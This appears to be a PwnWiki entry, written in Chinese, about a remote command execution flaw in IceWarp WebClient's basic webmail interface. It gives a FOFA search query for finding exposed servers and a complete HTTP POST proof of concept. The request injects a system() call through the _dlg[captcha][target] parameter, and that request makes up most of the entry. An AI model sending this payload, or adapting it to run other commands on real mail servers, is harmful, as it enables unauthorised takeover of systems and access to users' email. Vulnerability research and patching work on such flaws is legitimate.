IceWarp WebClient basic 遠程命令執行漏洞
From PwnWiki
漏洞影響
IceWarp WebClient
FOFA
app="IceWarp-公司产品"
POC
POST /webmail/basic/ HTTP/1.1 Host: x.x.x.x Content-Type: application/x-www-form-urlencoded Cookie: use_cookies=1 Content-Length: 43 _dlg[captcha][target]=system(\'ipconfig\')\